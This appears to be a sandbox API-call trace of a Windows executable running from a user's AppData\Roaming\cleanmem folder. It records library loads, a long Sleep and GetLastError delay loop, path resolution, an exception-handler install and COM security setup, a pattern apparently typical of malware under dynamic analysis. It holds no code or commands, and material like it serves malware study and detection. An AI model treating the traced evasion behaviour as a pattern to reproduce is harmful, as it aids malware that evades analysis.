SearchPath=0x0, LoadFlags=0x0, Name="USERENV.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefc8d0000) returned 0x0 [0128.568] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="IPHLPAPI.DLL", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefb000000) returned 0x0 [0128.580] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefde50000) returned 0x0 [0128.584] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefee70000) returned 0x0 [0128.587] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="bcrypt.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefcf90000) returned 0x0 [0128.588] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefed90000) returned 0x0 [0128.591] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fef6230000) returned 0x0 [0128.593] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ncrypt.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefcfc0000) returned 0x0 [0128.595] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefdcf0000) returned 0x0 [0128.596] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefd750000) returned 0x0 [0128.598] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7fefd900000) returned 0x0 [0128.600] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x24e830 | out: BaseAddress=0x24e830*=0x7feff380000) returned 0x0 [0128.614] Sleep (dwMilliseconds=0x1) [0128.632] GetLastError () returned 0xcb [0128.632] Sleep (dwMilliseconds=0x1) [0128.795] GetLastError () returned 0xcb [0128.795] Sleep (dwMilliseconds=0x1) [0128.878] GetLastError () returned 0xcb [0128.878] Sleep (dwMilliseconds=0x1) [0128.985] GetLastError () returned 0xcb [0128.985] Sleep (dwMilliseconds=0x1) [0129.039] GetLastError () returned 0xcb [0129.039] Sleep (dwMilliseconds=0x1) [0129.065] GetLastError () returned 0xcb [0129.065] Sleep (dwMilliseconds=0x1) [0129.086] GetLastError () returned 0xcb [0129.086] Sleep (dwMilliseconds=0x1) [0129.162] GetLastError () returned 0xcb [0129.162] Sleep (dwMilliseconds=0x1) [0129.223] GetLastError () returned 0xcb [0129.223] Sleep (dwMilliseconds=0x1) [0129.273] GetLastError () returned 0xcb [0129.273] Sleep (dwMilliseconds=0x1) [0129.323] GetLastError () returned 0xcb [0129.323] Sleep (dwMilliseconds=0x1) [0129.367] GetLastError () returned 0xcb [0129.367] Sleep (dwMilliseconds=0x1) [0129.396] GetLastError () returned 0xcb [0129.396] Sleep (dwMilliseconds=0x1) [0129.445] GetLastError () returned 0xcb [0129.445] Sleep (dwMilliseconds=0x1) [0129.483] GetLastError () returned 0xcb [0129.483] Sleep (dwMilliseconds=0x1) [0129.522] GetLastError () returned 0xcb [0129.522] Sleep (dwMilliseconds=0x1) [0129.582] GetLastError () returned 0xcb [0129.582] Sleep (dwMilliseconds=0x1) [0129.631] GetLastError () returned 0xcb [0129.632] Sleep (dwMilliseconds=0x1) [0129.682] GetLastError () returned 0xcb [0129.682] Sleep (dwMilliseconds=0x1) [0129.737] GetLastError () returned 0xcb [0129.737] Sleep (dwMilliseconds=0x1) [0129.784] GetLastError () returned 0xcb [0129.784] Sleep (dwMilliseconds=0x1) [0129.851] GetLastError () returned 0xcb [0129.851] Sleep (dwMilliseconds=0x1) [0129.940] GetLastError () returned 0xcb [0129.940] Sleep (dwMilliseconds=0x1) [0130.026] GetLastError () returned 0xcb [0130.026] Sleep (dwMilliseconds=0x1) [0130.099] GetLastError () returned 0xcb [0130.099] Sleep (dwMilliseconds=0x1) [0130.151] GetLastError () returned 0xcb [0130.151] Sleep (dwMilliseconds=0x1) [0130.209] GetLastError () returned 0xcb [0130.209] Sleep (dwMilliseconds=0x1) [0130.301] GetLastError () returned 0xcb [0130.301] Sleep (dwMilliseconds=0x1) [0130.352] GetLastError () returned 0xcb [0130.352] Sleep (dwMilliseconds=0x1) [0130.416] GetLastError () returned 0xcb [0130.416] Sleep (dwMilliseconds=0x1) [0130.474] GetLastError () returned 0xcb [0130.474] Sleep (dwMilliseconds=0x1) [0130.507] GetLastError () returned 0xcb [0130.507] Sleep (dwMilliseconds=0x1) [0130.550] GetLastError () returned 0xcb [0130.551] Sleep (dwMilliseconds=0x1) [0130.587] GetLastError () returned 0xcb [0130.587] Sleep (dwMilliseconds=0x1) [0130.599] GetLastError () returned 0xcb [0130.599] Sleep (dwMilliseconds=0x1) [0130.646] GetLastError () returned 0xcb [0130.646] Sleep (dwMilliseconds=0x1) [0130.714] GetLastError () returned 0xcb [0130.714] Sleep (dwMilliseconds=0x1) [0130.760] GetLastError () returned 0xcb [0130.760] Sleep (dwMilliseconds=0x1) [0130.787] GetLastError () returned 0xcb [0130.787] Sleep (dwMilliseconds=0x1) [0130.802] GetLastError () returned 0xcb [0130.802] Sleep (dwMilliseconds=0x1) [0130.845] GetLastError () returned 0xcb [0130.845] Sleep (dwMilliseconds=0x1) [0130.855] GetLastError () returned 0xcb [0130.855] Sleep (dwMilliseconds=0x1) [0130.867] GetLastError () returned 0xcb [0130.867] Sleep (dwMilliseconds=0x1) [0130.904] GetLastError () returned 0xcb [0130.904] Sleep (dwMilliseconds=0x1) [0130.949] GetLastError () returned 0xcb [0130.949] Sleep (dwMilliseconds=0x1) [0130.996] GetLastError () returned 0xcb [0130.996] Sleep (dwMilliseconds=0x1) [0131.031] GetLastError () returned 0xcb [0131.031] Sleep (dwMilliseconds=0x1) [0131.165] GetLastError () returned 0xcb [0131.165] Sleep (dwMilliseconds=0x1) [0131.213] GetLastError () returned 0xcb [0131.213] Sleep (dwMilliseconds=0x1) [0131.231] GetLastError () returned 0xcb [0131.231] Sleep (dwMilliseconds=0x1) [0131.240] GetLastError () returned 0xcb [0131.240] Sleep (dwMilliseconds=0x1) [0131.286] GetLastError () returned 0xcb [0131.286] Sleep (dwMilliseconds=0x1) [0131.342] GetLastError () returned 0xcb [0131.342] Sleep (dwMilliseconds=0x1) [0131.415] GetLastError () returned 0xcb [0131.415] Sleep (dwMilliseconds=0x1) [0131.475] GetLastError () returned 0xcb [0131.475] Sleep (dwMilliseconds=0x1) [0131.512] GetLastError () returned 0xcb [0131.512] Sleep (dwMilliseconds=0x1) [0131.522] GetLastError () returned 0xcb [0131.522] Sleep (dwMilliseconds=0x1) [0131.540] GetLastError () returned 0xcb [0131.540] Sleep (dwMilliseconds=0x1) [0131.596] GetLastError () returned 0xcb [0131.596] Sleep (dwMilliseconds=0x1) [0131.618] GetLastError () returned 0xcb [0131.619] Sleep (dwMilliseconds=0x1) [0131.635] GetLastError () returned 0xcb [0131.635] Sleep (dwMilliseconds=0x1) [0131.648] GetLastError () returned 0xcb [0131.648] Sleep (dwMilliseconds=0x1) [0131.696] GetLastError () returned 0xcb [0131.696] Sleep (dwMilliseconds=0x1) [0131.783] GetLastError () returned 0xcb [0131.783] Sleep (dwMilliseconds=0x1) [0131.877] GetLastError () returned 0xcb [0131.877] Sleep (dwMilliseconds=0x1) [0131.892] GetLastError () returned 0xcb [0131.892] Sleep (dwMilliseconds=0x1) [0131.908] GetLastError () returned 0xcb [0131.908] Sleep (dwMilliseconds=0x1) [0131.923] GetLastError () returned 0xcb [0131.923] Sleep (dwMilliseconds=0x1) [0131.939] GetLastError () returned 0xcb [0131.939] Sleep (dwMilliseconds=0x1) [0131.954] GetLastError () returned 0xcb [0131.955] Sleep (dwMilliseconds=0x1) [0131.970] GetLastError () returned 0xcb [0131.970] Sleep (dwMilliseconds=0x1) [0131.988] GetLastError () returned 0xcb [0131.988] Sleep (dwMilliseconds=0x1) [0132.064] GetLastError () returned 0xcb [0132.064] Sleep (dwMilliseconds=0x1) [0132.105] GetLastError () returned 0xcb [0132.105] Sleep (dwMilliseconds=0x1) [0132.126] GetLastError () returned 0xcb [0132.126] Sleep (dwMilliseconds=0x1) [0132.126] GetLastError () returned 0xcb [0132.126] Sleep (dwMilliseconds=0x1) [0132.144] GetLastError () returned 0xcb [0132.144] Sleep (dwMilliseconds=0x1) [0132.172] GetLastError () returned 0xcb [0132.172] Sleep (dwMilliseconds=0x1) [0132.173] GetLastError () returned 0xcb [0132.173] Sleep (dwMilliseconds=0x1) [0132.189] GetLastError () returned 0xcb [0132.189] Sleep (dwMilliseconds=0x1) [0132.266] GetLastError () returned 0xcb [0132.266] Sleep (dwMilliseconds=0x1) [0132.320] GetLastError () returned 0xcb [0132.320] Sleep (dwMilliseconds=0x1) [0132.329] GetLastError () returned 0xcb [0132.329] Sleep (dwMilliseconds=0x1) [0132.345] GetLastError () returned 0xcb [0132.345] Sleep (dwMilliseconds=0x1) [0132.364] GetLastError () returned 0xcb [0132.364] Sleep (dwMilliseconds=0x1) [0132.376] GetLastError () returned 0xcb [0132.376] Sleep (dwMilliseconds=0x1) [0132.392] GetLastError () returned 0xcb [0132.392] Sleep (dwMilliseconds=0x1) [0132.454] GetLastError () returned 0xcb [0132.454] Sleep (dwMilliseconds=0x1) [0132.476] GetLastError () returned 0xcb [0132.477] Sleep (dwMilliseconds=0x1) [0132.485] GetLastError () returned 0xcb [0132.485] Sleep (dwMilliseconds=0x1) [0132.500] GetLastError () returned 0xcb [0132.500] Sleep (dwMilliseconds=0x1) [0132.516] GetLastError () returned 0xcb [0132.516] Sleep (dwMilliseconds=0x1) [0132.534] GetLastError () returned 0xcb [0132.534] Sleep (dwMilliseconds=0x1) [0132.575] GetLastError () returned 0xcb [0132.575] Sleep (dwMilliseconds=0x1) [0132.579] GetLastError () returned 0xcb [0132.579] Sleep (dwMilliseconds=0x1) [0132.595] GetLastError () returned 0xcb [0132.595] Sleep (dwMilliseconds=0x1) [0132.611] GetLastError () returned 0xcb [0132.611] Sleep (dwMilliseconds=0x1) [0132.625] GetLastError () returned 0xcb [0132.626] Sleep (dwMilliseconds=0x1) [0132.641] GetLastError () returned 0xcb [0132.641] Sleep (dwMilliseconds=0x1) [0132.667] GetLastError () returned 0xcb [0132.667] Sleep (dwMilliseconds=0x1) [0132.673] GetLastError () returned 0xcb [0132.673] Sleep (dwMilliseconds=0x1) [0132.688] GetLastError () returned 0xcb [0132.688] Sleep (dwMilliseconds=0x1) [0132.703] GetLastError () returned 0xcb [0132.703] Sleep (dwMilliseconds=0x1) [0132.720] GetLastError () returned 0xcb [0132.720] Sleep (dwMilliseconds=0x1) [0132.734] GetLastError () returned 0xcb [0132.734] Sleep (dwMilliseconds=0x1) [0132.751] GetLastError () returned 0xcb [0132.751] Sleep (dwMilliseconds=0x1) [0132.772] GetLastError () returned 0xcb [0132.772] Sleep (dwMilliseconds=0x1) [0132.782] GetLastError () returned 0xcb [0132.782] Sleep (dwMilliseconds=0x1) [0132.799] GetLastError () returned 0xcb [0132.799] Sleep (dwMilliseconds=0x1) [0132.812] GetLastError () returned 0xcb [0132.812] Sleep (dwMilliseconds=0x1) [0132.932] GetLastError () returned 0xcb [0132.932] Sleep (dwMilliseconds=0x1) [0132.943] GetLastError () returned 0xcb [0132.943] Sleep (dwMilliseconds=0x1) [0132.953] GetLastError () returned 0xcb [0132.953] Sleep (dwMilliseconds=0x1) [0132.968] GetLastError () returned 0xcb [0132.968] Sleep (dwMilliseconds=0x1) [0132.984] GetLastError () returned 0xcb [0132.984] Sleep (dwMilliseconds=0x1) [0133.033] GetLastError () returned 0xcb [0133.033] Sleep (dwMilliseconds=0x1) [0133.046] GetLastError () returned 0xcb [0133.047] Sleep (dwMilliseconds=0x1) [0133.078] GetLastError () returned 0xcb [0133.078] Sleep (dwMilliseconds=0x1) [0133.139] GetLastError () returned 0xcb [0133.139] Sleep (dwMilliseconds=0x1) [0133.188] GetLastError () returned 0xcb [0133.188] Sleep (dwMilliseconds=0x1) [0133.212] GetLastError () returned 0xcb [0133.212] Sleep (dwMilliseconds=0x1) [0133.218] GetLastError () returned 0xcb [0133.218] Sleep (dwMilliseconds=0x1) [0133.254] GetLastError () returned 0xcb [0133.254] Sleep (dwMilliseconds=0x1) [0133.281] GetLastError () returned 0xcb [0133.281] Sleep (dwMilliseconds=0x1) [0133.307] GetLastError () returned 0xcb [0133.307] Sleep (dwMilliseconds=0x1) [0133.359] GetLastError () returned 0xcb [0133.359] Sleep (dwMilliseconds=0x1) [0133.435] GetLastError () returned 0xcb [0133.435] Sleep (dwMilliseconds=0x1) [0133.436] GetLastError () returned 0xcb [0133.436] Sleep (dwMilliseconds=0x1) [0133.454] GetLastError () returned 0xcb [0133.454] Sleep (dwMilliseconds=0x1) [0133.475] GetLastError () returned 0xcb [0133.475] Sleep (dwMilliseconds=0x1) [0133.493] GetLastError () returned 0xcb [0133.493] Sleep (dwMilliseconds=0x1) [0133.499] GetLastError () returned 0xcb [0133.499] Sleep (dwMilliseconds=0x1) [0133.514] GetLastError () returned 0xcb [0133.514] Sleep (dwMilliseconds=0x1) [0133.578] GetLastError () returned 0xcb [0133.578] Sleep (dwMilliseconds=0x1) [0133.596] GetLastError () returned 0xcb [0133.596] Sleep (dwMilliseconds=0x1) [0133.613] GetLastError () returned 0xcb [0133.613] Sleep (dwMilliseconds=0x1) [0133.624] GetLastError () returned 0xcb [0133.624] Sleep (dwMilliseconds=0x1) [0133.661] GetLastError () returned 0xcb [0133.661] Sleep (dwMilliseconds=0x1) [0133.702] GetLastError () returned 0xcb [0133.702] Sleep (dwMilliseconds=0x1) [0133.756] GetLastError () returned 0xcb [0133.756] Sleep (dwMilliseconds=0x1) [0133.799] GetLastError () returned 0xcb [0133.799] Sleep (dwMilliseconds=0x1) [0133.811] GetLastError () returned 0xcb [0133.811] Sleep (dwMilliseconds=0x1) [0133.826] GetLastError () returned 0xcb [0133.826] Sleep (dwMilliseconds=0x1) [0133.889] GetLastError () returned 0xcb [0133.889] Sleep (dwMilliseconds=0x1) [0133.951] GetLastError () returned 0xcb [0133.951] Sleep (dwMilliseconds=0x1) [0133.967] GetLastError () returned 0xcb [0133.967] Sleep (dwMilliseconds=0x1) [0133.982] GetLastError () returned 0xcb [0133.982] Sleep (dwMilliseconds=0x1) [0133.999] GetLastError () returned 0xcb [0133.999] Sleep (dwMilliseconds=0x1) [0134.014] GetLastError () returned 0xcb [0134.014] Sleep (dwMilliseconds=0x1) [0134.029] GetLastError () returned 0xcb [0134.029] Sleep (dwMilliseconds=0x1) [0134.107] GetLastError () returned 0xcb [0134.107] Sleep (dwMilliseconds=0x1) [0134.133] GetLastError () returned 0xcb [0134.133] Sleep (dwMilliseconds=0x1) [0134.139] GetLastError () returned 0xcb [0134.139] Sleep (dwMilliseconds=0x1) [0134.160] GetLastError () returned 0xcb [0134.160] Sleep (dwMilliseconds=0x1) [0134.201] GetLastError () returned 0xcb [0134.201] Sleep (dwMilliseconds=0x1) [0134.248] GetLastError () returned 0xcb [0134.248] Sleep (dwMilliseconds=0x1) [0134.326] GetLastError () returned 0xcb [0134.326] Sleep (dwMilliseconds=0x1) [0134.349] GetLastError () returned 0xcb [0134.349] Sleep (dwMilliseconds=0x1) [0134.366] GetLastError () returned 0xcb [0134.366] Sleep (dwMilliseconds=0x1) [0134.387] GetLastError () returned 0xcb [0134.387] Sleep (dwMilliseconds=0x1) [0134.399] GetLastError () returned 0xcb [0134.399] Sleep (dwMilliseconds=0x1) [0134.404] GetLastError () returned 0xcb [0134.404] Sleep (dwMilliseconds=0x1) [0134.419] GetLastError () returned 0xcb [0134.419] Sleep (dwMilliseconds=0x1) [0134.435] GetLastError () returned 0xcb [0134.435] Sleep (dwMilliseconds=0x1) [0134.450] GetLastError () returned 0xcb [0134.450] Sleep (dwMilliseconds=0x1) [0134.466] GetLastError () returned 0xcb [0134.466] Sleep (dwMilliseconds=0x1) [0134.482] GetLastError () returned 0xcb [0134.482] Sleep (dwMilliseconds=0x1) [0134.497] GetLastError () returned 0xcb [0134.497] Sleep (dwMilliseconds=0x1) [0134.513] GetLastError () returned 0xcb [0134.513] Sleep (dwMilliseconds=0x1) [0134.529] GetLastError () returned 0xcb [0134.529] Sleep (dwMilliseconds=0x1) [0134.544] GetLastError () returned 0xcb [0134.544] Sleep (dwMilliseconds=0x1) [0134.561] GetLastError () returned 0xcb [0134.561] Sleep (dwMilliseconds=0x1) [0134.590] GetLastError () returned 0xcb [0134.590] Sleep (dwMilliseconds=0x1) [0134.600] GetLastError () returned 0xcb [0134.600] Sleep (dwMilliseconds=0x1) [0134.631] GetLastError () returned 0xcb [0134.631] Sleep (dwMilliseconds=0x1) [0134.638] GetLastError () returned 0xcb [0134.638] Sleep (dwMilliseconds=0x1) [0134.653] GetLastError () returned 0xcb [0134.653] Sleep (dwMilliseconds=0x1) [0134.669] GetLastError () returned 0xcb [0134.669] Sleep (dwMilliseconds=0x1) [0134.739] GetLastError () returned 0xcb [0134.739] Sleep (dwMilliseconds=0x1) [0134.779] GetLastError () returned 0xcb [0134.779] Sleep (dwMilliseconds=0x1) [0134.809] GetLastError () returned 0xcb [0134.809] Sleep (dwMilliseconds=0x1) [0134.872] GetLastError () returned 0xcb [0134.872] Sleep (dwMilliseconds=0x1) [0134.927] GetLastError () returned 0xcb [0134.927] Sleep (dwMilliseconds=0x1) [0134.966] GetLastError () returned 0xcb [0134.966] Sleep (dwMilliseconds=0x1) [0135.013] GetLastError () returned 0xcb [0135.013] Sleep (dwMilliseconds=0x1) [0135.076] GetLastError () returned 0xcb [0135.076] Sleep (dwMilliseconds=0x1) [0135.094] GetLastError () returned 0xcb [0135.094] Sleep (dwMilliseconds=0x1) [0135.106] GetLastError () returned 0xcb [0135.106] Sleep (dwMilliseconds=0x1) [0135.121] GetLastError () returned 0xcb [0135.121] Sleep (dwMilliseconds=0x1) [0135.137] GetLastError () returned 0xcb [0135.137] Sleep (dwMilliseconds=0x1) [0135.152] GetLastError () returned 0xcb [0135.152] Sleep (dwMilliseconds=0x1) [0135.168] GetLastError () returned 0xcb [0135.168] Sleep (dwMilliseconds=0x1) [0135.203] GetLastError () returned 0xcb [0135.203] Sleep (dwMilliseconds=0x1) [0135.215] GetLastError () returned 0xcb [0135.215] Sleep (dwMilliseconds=0x1) [0135.236] GetLastError () returned 0xcb [0135.236] Sleep (dwMilliseconds=0x1) [0135.247] GetLastError () returned 0xcb [0135.247] Sleep (dwMilliseconds=0x1) [0135.288] GetLastError () returned 0xcb [0135.288] Sleep (dwMilliseconds=0x1) [0135.368] GetLastError () returned 0xcb [0135.368] Sleep (dwMilliseconds=0x1) [0135.392] GetLastError () returned 0xcb [0135.392] Sleep (dwMilliseconds=0x1) [0135.403] GetLastError () returned 0xcb [0135.403] Sleep (dwMilliseconds=0x1) [0135.418] GetLastError () returned 0xcb [0135.418] Sleep (dwMilliseconds=0x1) [0135.434] GetLastError () returned 0xcb [0135.434] Sleep (dwMilliseconds=0x1) [0135.449] GetLastError () returned 0xcb [0135.449] Sleep (dwMilliseconds=0x1) [0135.464] GetLastError () returned 0xcb [0135.464] Sleep (dwMilliseconds=0x1) [0135.480] GetLastError () returned 0xcb [0135.480] Sleep (dwMilliseconds=0x1) [0135.496] GetLastError () returned 0xcb [0135.496] Sleep (dwMilliseconds=0x1) [0135.511] GetLastError () returned 0xcb [0135.511] Sleep (dwMilliseconds=0x1) [0135.543] GetLastError () returned 0xcb [0135.544] Sleep (dwMilliseconds=0x1) [0135.577] GetLastError () returned 0xcb [0135.577] Sleep (dwMilliseconds=0x1) [0135.624] GetLastError () returned 0xcb [0135.624] Sleep (dwMilliseconds=0x1) [0135.669] GetLastError () returned 0xcb [0135.669] Sleep (dwMilliseconds=0x1) [0135.685] GetLastError () returned 0xcb [0135.685] Sleep (dwMilliseconds=0x1) [0135.699] GetLastError () returned 0xcb [0135.699] Sleep (dwMilliseconds=0x1) [0135.724] GetLastError () returned 0xcb [0135.724] Sleep (dwMilliseconds=0x1) [0135.742] GetLastError () returned 0xcb [0135.742] Sleep (dwMilliseconds=0x1) [0135.745] GetLastError () returned 0xcb [0135.745] Sleep (dwMilliseconds=0x1) [0135.762] GetLastError () returned 0xcb [0135.762] Sleep (dwMilliseconds=0x1) [0135.776] GetLastError () returned 0xcb [0135.776] Sleep (dwMilliseconds=0x1) [0135.802] GetLastError () returned 0xcb [0135.802] Sleep (dwMilliseconds=0x1) [0135.812] GetLastError () returned 0xcb [0135.812] Sleep (dwMilliseconds=0x1) [0135.850] GetLastError () returned 0xcb [0135.850] Sleep (dwMilliseconds=0x1) [0135.868] GetLastError () returned 0xcb [0135.868] Sleep (dwMilliseconds=0x1) [0135.870] GetLastError () returned 0xcb [0135.870] Sleep (dwMilliseconds=0x1) [0135.917] GetLastError () returned 0xcb [0135.917] Sleep (dwMilliseconds=0x1) [0135.943] GetLastError () returned 0xcb [0135.943] Sleep (dwMilliseconds=0x1) [0135.951] GetLastError () returned 0xcb [0135.951] Sleep (dwMilliseconds=0x1) [0135.964] GetLastError () returned 0xcb [0135.964] Sleep (dwMilliseconds=0x1) [0135.980] GetLastError () returned 0xcb [0135.980] Sleep (dwMilliseconds=0x1) [0135.995] GetLastError () returned 0xcb [0135.995] Sleep (dwMilliseconds=0x1) [0136.011] GetLastError () returned 0xcb [0136.011] Sleep (dwMilliseconds=0x1) [0136.026] GetLastError () returned 0xcb [0136.026] Sleep (dwMilliseconds=0x1) [0136.042] GetLastError () returned 0xcb [0136.042] Sleep (dwMilliseconds=0x1) [0136.062] GetLastError () returned 0xcb [0136.062] Sleep (dwMilliseconds=0x1) [0136.073] GetLastError () returned 0xcb [0136.073] Sleep (dwMilliseconds=0x1) [0136.088] GetLastError () returned 0xcb [0136.088] Sleep (dwMilliseconds=0x1) [0136.104] GetLastError () returned 0xcb [0136.104] Sleep (dwMilliseconds=0x1) [0136.120] GetLastError () returned 0xcb [0136.120] Sleep (dwMilliseconds=0x1) [0136.135] GetLastError () returned 0xcb [0136.135] Sleep (dwMilliseconds=0x1) [0136.151] GetLastError () returned 0xcb [0136.151] Sleep (dwMilliseconds=0x1) [0136.176] GetLastError () returned 0xcb [0136.176] Sleep (dwMilliseconds=0x1) [0136.182] GetLastError () returned 0xcb [0136.182] Sleep (dwMilliseconds=0x1) [0136.218] GetLastError () returned 0xcb [0136.218] Sleep (dwMilliseconds=0x1) [0136.236] GetLastError () returned 0xcb [0136.236] Sleep (dwMilliseconds=0x1) [0136.276] GetLastError () returned 0xcb [0136.276] Sleep (dwMilliseconds=0x1) [0136.295] GetLastError () returned 0xcb [0136.295] Sleep (dwMilliseconds=0x1) [0136.310] GetLastError () returned 0xcb [0136.310] Sleep (dwMilliseconds=0x1) [0136.323] GetLastError () returned 0xcb [0136.323] Sleep (dwMilliseconds=0x1) [0136.353] GetLastError () returned 0xcb [0136.353] Sleep (dwMilliseconds=0x1) [0136.371] GetLastError () returned 0xcb [0136.371] Sleep (dwMilliseconds=0x1) [0136.386] GetLastError () returned 0xcb [0136.386] Sleep (dwMilliseconds=0x1) [0136.440] GetLastError () returned 0xcb [0136.440] Sleep (dwMilliseconds=0x1) [0136.447] GetLastError () returned 0xcb [0136.447] Sleep (dwMilliseconds=0x1) [0136.463] GetLastError () returned 0xcb [0136.463] Sleep (dwMilliseconds=0x1) [0136.478] GetLastError () returned 0xcb [0136.478] Sleep (dwMilliseconds=0x1) [0136.494] GetLastError () returned 0xcb [0136.494] Sleep (dwMilliseconds=0x1) [0136.510] GetLastError () returned 0xcb [0136.510] Sleep (dwMilliseconds=0x1) [0136.525] GetLastError () returned 0xcb [0136.525] Sleep (dwMilliseconds=0x1) [0136.541] GetLastError () returned 0xcb [0136.541] Sleep (dwMilliseconds=0x1) [0136.556] GetLastError () returned 0xcb [0136.557] Sleep (dwMilliseconds=0x1) [0136.572] GetLastError () returned 0xcb [0136.572] Sleep (dwMilliseconds=0x1) [0136.588] GetLastError () returned 0xcb [0136.588] Sleep (dwMilliseconds=0x1) [0136.603] GetLastError () returned 0xcb [0136.603] Sleep (dwMilliseconds=0x1) [0136.619] GetLastError () returned 0xcb [0136.619] Sleep (dwMilliseconds=0x1) [0136.635] GetLastError () returned 0xcb [0136.635] Sleep (dwMilliseconds=0x1) [0136.650] GetLastError () returned 0xcb [0136.651] Sleep (dwMilliseconds=0x1) [0136.666] GetLastError () returned 0xcb [0136.666] Sleep (dwMilliseconds=0x1) [0136.681] GetLastError () returned 0xcb [0136.681] Sleep (dwMilliseconds=0x1) [0136.697] GetLastError () returned 0xcb [0136.697] Sleep (dwMilliseconds=0x1) [0136.712] GetLastError () returned 0xcb [0136.712] Sleep (dwMilliseconds=0x1) [0136.737] GetLastError () returned 0xcb [0136.737] Sleep (dwMilliseconds=0x1) [0136.744] GetLastError () returned 0xcb [0136.744] Sleep (dwMilliseconds=0x1) [0136.760] GetLastError () returned 0xcb [0136.760] Sleep (dwMilliseconds=0x1) [0136.777] GetLastError () returned 0xcb [0136.777] Sleep (dwMilliseconds=0x1) [0136.791] GetLastError () returned 0xcb [0136.791] Sleep (dwMilliseconds=0x1) [0136.806] GetLastError () returned 0xcb [0136.806] Sleep (dwMilliseconds=0x1) [0136.822] GetLastError () returned 0xcb [0136.822] Sleep (dwMilliseconds=0x1) [0136.837] GetLastError () returned 0xcb [0136.837] Sleep (dwMilliseconds=0x1) [0136.853] GetLastError () returned 0xcb [0136.853] Sleep (dwMilliseconds=0x1) [0136.871] GetLastError () returned 0xcb [0136.871] Sleep (dwMilliseconds=0x1) [0136.884] GetLastError () returned 0xcb [0136.884] Sleep (dwMilliseconds=0x1) [0136.900] GetLastError () returned 0xcb [0136.900] Sleep (dwMilliseconds=0x1) [0136.916] GetLastError () returned 0xcb [0136.916] Sleep (dwMilliseconds=0x1) [0136.931] GetLastError () returned 0xcb [0136.931] Sleep (dwMilliseconds=0x1) [0136.946] GetLastError () returned 0xcb [0136.947] Sleep (dwMilliseconds=0x1) [0136.962] GetLastError () returned 0xcb [0136.962] Sleep (dwMilliseconds=0x1) [0136.979] GetLastError () returned 0xcb [0136.979] Sleep (dwMilliseconds=0x1) [0136.993] GetLastError () returned 0xcb [0136.993] Sleep (dwMilliseconds=0x1) [0137.009] GetLastError () returned 0xcb [0137.009] Sleep (dwMilliseconds=0x1) [0137.024] GetLastError () returned 0xcb [0137.024] Sleep (dwMilliseconds=0x1) [0137.040] GetLastError () returned 0xcb [0137.040] Sleep (dwMilliseconds=0x1) [0137.056] GetLastError () returned 0xcb [0137.056] Sleep (dwMilliseconds=0x1) [0137.071] GetLastError () returned 0xcb [0137.071] Sleep (dwMilliseconds=0x1) [0137.087] GetLastError () returned 0xcb [0137.087] Sleep (dwMilliseconds=0x1) [0137.103] GetLastError () returned 0xcb [0137.103] Sleep (dwMilliseconds=0x1) [0137.118] GetLastError () returned 0xcb [0137.118] Sleep (dwMilliseconds=0x1) [0137.134] GetLastError () returned 0xcb [0137.134] Sleep (dwMilliseconds=0x1) [0137.149] GetLastError () returned 0xcb [0137.149] Sleep (dwMilliseconds=0x1) [0137.165] GetLastError () returned 0xcb [0137.165] Sleep (dwMilliseconds=0x1) [0137.180] GetLastError () returned 0xcb [0137.180] Sleep (dwMilliseconds=0x1) [0137.197] GetLastError () returned 0xcb [0137.197] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24ea60, nSize=0x200 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0137.197] Sleep (dwMilliseconds=0x1) [0137.212] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem") returned 1 [0137.212] Sleep (dwMilliseconds=0x1) [0137.228] PathAddBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\") returned="" [0137.228] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x43a830, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0137.228] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem")) returned 1 [0137.228] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x1000e780) returned 0x439180 [0137.228] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0137.472] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0137.485] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 